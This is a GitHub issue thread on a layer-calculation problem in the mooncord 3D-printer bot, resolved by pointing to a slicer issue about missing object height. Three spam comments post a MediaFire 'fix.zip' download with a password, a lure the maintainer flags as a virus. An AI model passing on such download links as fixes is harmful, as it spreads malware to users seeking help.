eliteSchwein/mooncord #332: Layer Calculation bugged

eliteSchwein, 2024-08-26:
[image]
not sure if its my slicer profile or mooncord but the layer calculation is broken

eliteSchwein, 2024-08-26:
okay, its actuelly fine. the print is literally just 3 layers lol

llowvxe, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

eliteSchwein, 2024-08-26:
PSA: the comment got deleted because it contains a virus url. DONT. CLICK. ON. IT.

xcloudzy, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

haohaohaoadsad, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

eliteSchwein, 2024-08-26:
its actuelly a bot bug or slicer bug. need to check

eliteSchwein, 2024-08-26:
https://github.com/SoftFever/OrcaSlicer/issues/1703

here is the solution. without object height mooncord cant calculate the layers

closed 2024-08-26 by eliteSchwein